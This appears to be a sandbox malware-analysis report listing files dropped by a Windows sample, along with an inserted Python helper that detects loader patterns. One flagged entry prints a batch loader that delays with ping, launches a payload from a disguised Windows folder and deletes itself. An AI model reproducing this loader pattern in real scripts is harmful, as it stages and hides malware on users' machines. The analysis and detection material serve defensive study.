                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                                        Process:C:\Recovery\conhost.exe
                                                                                        File Type:CSV text
                                                                                        Category:dropped
                                                                                        Size (bytes):847
                                                                                        Entropy (8bit):5.354334472896228
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                        MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                        SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                        SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                        SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):19253
                                                                                        Entropy (8bit):5.005753878328145
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                                        MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                                        SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                                        SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                                        SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                                        Malicious:false
                                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):0.34726597513537405
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlll:Nll
                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                        Malicious:false
                                                                                        Preview:@...e...........................................................
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):25
                                                                                        Entropy (8bit):4.323856189774724
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:DMSQdf1Wn:Cdf1W
                                                                                        MD5:5346CBA842B23322B403F425945D6C55
                                                                                        SHA1:9F481FA725D2E38CB4CF35D93EF25EDD6129B4FD
                                                                                        SHA-256:6E18CF28007568BCA764C2697E88518274B2BA3AA1E442415C548AAD9B1F124F
                                                                                        SHA-512:AC46F88E0F2E566BB10FAC2E28919F5FBD58036AC42DE395F6E7ECC2D150432996A8AF0F2CBD6119CA7E42A381CF0944C53D02004DA380148A9DA6E868FE4747
                                                                                        Malicious:false
                                                                                        Preview:CRDOidfxeyy5uTqZ1nQhq9doh
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):179
                                                                                        Entropy (8bit):5.43703237979197
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mVB08iQx6BXULsBktKcKZG1t+kiE2J5xAIYP7dqK:hCRLuVFOOr+DEE8iRBXULsKOZG1wkn2q
                                                                                        MD5:3308516292EB170D70419DBD85DED61C
                                                                                        SHA1:A26D5A0869094A8BBCF4D784B2ABC2A625A4CAA7
                                                                                        SHA-256:115AE8A00EEE88DB65298D0D4B6E3BCE63DF377B0917D8131A23553144C1175E
                                                                                        SHA-512:DB68A1011A7749F5B7D3F66E65AFACF2DEEFC2CA43833B90504D1DBBD44DDD34E3F92FFDBBDD4CCDBF955A37F51DA8B81CACB01A7DD994C700257AEA2AF5881A
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\BO7Y63UfdW.bat"
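The batch file previewed above is the loader stage of this sample: `chcp 65001` switches the console to UTF-8, `ping -n 10 localhost > nul` stalls for roughly nine seconds without calling a sleep API, `start` launches the dropped copy from a non-standard subdirectory of C:\Windows, and `del` removes the script itself from %TEMP%. The following Python triage helper is an added example for this page, not Joe Sandbox code. It parses a batch file of this shape, extracts those behaviours, and applies the two location checks the report's Sigma hits describe (executable started from an unusual C:\Windows subdirectory, and a system process name such as conhost.exe outside its normal directory). The sample script is a constructed copy of the preview with the CR/LF bytes restored; the allow-list of Windows executable directories and the set of system process names are assumptions made for the example.

```python
"""Triage helper for small dropper batch files like the one in this report.

Added example for this page; it is not Joe Sandbox code. The allow-list of
Windows executable directories and the set of system process names below are
assumptions made for the example.
"""
import re
from pathlib import PureWindowsPath

# Constructed copy of the dropped batch file from the report. The sandbox
# preview renders the CR/LF bytes as dots; they are restored here.
SAMPLE_BAT = (
    "@echo off\r\n"
    "chcp 65001\r\n"
    "ping -n 10 localhost > nul\r\n"
    'start "" "C:\\Windows\\INF\\.NET CLR Data\\TezdDRgSgyeGDKRkzk.exe"\r\n'
    'del /a /q /f "C:\\Users\\user\\AppData\\Local\\Temp\\\\BO7Y63UfdW.bat"\r\n'
)

# Assumption: the only places under C:\Windows from which a started executable
# is considered ordinary. Anything else under C:\Windows is reported, matching
# the "drops executables to the Windows directory and starts them" behaviour.
WINDOWS_EXE_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}

# Assumption: names of Windows system binaries. One of these outside
# WINDOWS_EXE_DIRS (C:\Recovery\conhost.exe in this report) is the
# "system process name in unsuspected location" pattern.
SYSTEM_PROCESS_NAMES = {"conhost.exe", "svchost.exe", "csrss.exe", "lsass.exe",
                        "winlogon.exe", "explorer.exe", "dllhost.exe"}

LOOPBACK = {"localhost", "127.0.0.1", "::1"}
PING_COUNT_RE = re.compile(r"-n\s+(\d+)", re.I)
START_RE = re.compile(r'^\s*start\s+(?:"[^"]*"\s+)?"([^"]+)"', re.I)
DEL_RE = re.compile(r'^\s*del\s+(?:/\w+\s+)*"([^"]+)"', re.I)


def normalize(path: str) -> str:
    # PureWindowsPath collapses the doubled backslash in Temp\\BO7Y63UfdW.bat
    return str(PureWindowsPath(path))


def path_findings(path: str) -> list:
    """Return the location anomalies for an executable path (empty if none)."""
    p = PureWindowsPath(path)
    parent = str(p.parent).lower()
    name = p.name.lower()
    under_windows = parent == r"c:\windows" or parent.startswith("c:\\windows\\")
    findings = []
    if under_windows and parent not in WINDOWS_EXE_DIRS:
        findings.append("executable in a non-standard C:\\Windows subdirectory")
    if name in SYSTEM_PROCESS_NAMES and parent not in WINDOWS_EXE_DIRS:
        findings.append("system process name outside its normal location")
    return findings


def analyze_batch(text: str) -> dict:
    """Pull the loader behaviours out of a batch script."""
    result = {"ping_count": None, "sleep_via_ping": False, "started": [],
              "deleted": [], "deletes_script": False, "path_findings": {}}
    for raw in text.splitlines():
        line = raw.strip()
        tokens = line.lower().split()
        if not tokens:
            continue
        cmd = tokens[0]
        if cmd in ("ping", "ping.exe"):
            # ping -n N <loopback> > nul is a sleep of roughly N-1 seconds:
            # replies arrive a second apart and the output is discarded.
            m = PING_COUNT_RE.search(line)
            result["ping_count"] = int(m.group(1)) if m else 4  # 4 is ping's default
            result["sleep_via_ping"] = any(t in LOOPBACK for t in tokens[1:])
        elif cmd == "start":
            m = START_RE.match(line)
            if m:
                target = normalize(m.group(1))
                result["started"].append(target)
                hits = path_findings(target)
                if hits:
                    result["path_findings"][target] = hits
        elif cmd == "del":
            m = DEL_RE.match(line)
            if m:
                target = normalize(m.group(1))
                result["deleted"].append(target)
                if target.lower().endswith((".bat", ".cmd")):
                    result["deletes_script"] = True
    # Loader shape: wait, launch the staged payload, remove the script.
    result["is_loader"] = bool(result["sleep_via_ping"] and result["started"]
                               and result["deletes_script"])
    return result


if __name__ == "__main__":
    import json
    print(json.dumps(analyze_batch(SAMPLE_BAT), indent=2))
    print(path_findings(r"C:\Recovery\conhost.exe"))
```

Run against the report's batch file, `analyze_batch` reports a ping count of 10 against a loopback target, one started executable under `C:\Windows\INF\.NET CLR Data`, a deleted `.bat` in %TEMP%, and `is_loader` true; `path_findings` on `C:\Recovery\conhost.exe` returns the masquerading finding and returns nothing for `C:\Windows\System32\conhost.exe`. The same function can be pointed at the other drop locations listed in this report to confirm which ones fall outside the allow-list.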
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):114688
                                                                                        Entropy (8bit):0.9746603542602881
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):20480
                                                                                        Entropy (8bit):0.5707520969659783
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):98304
                                                                                        Entropy (8bit):0.08235737944063153
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):20480
                                                                                        Entropy (8bit):0.5707520969659783
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):1.1358696453229276
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):20480
                                                                                        Entropy (8bit):0.5712781801655107
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):40960
                                                                                        Entropy (8bit):0.8553638852307782
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
(The same 60-byte file, with identical size, hashes, entropy and preview, is listed 19 further times, each written by C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and each marked Malicious:false.)
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
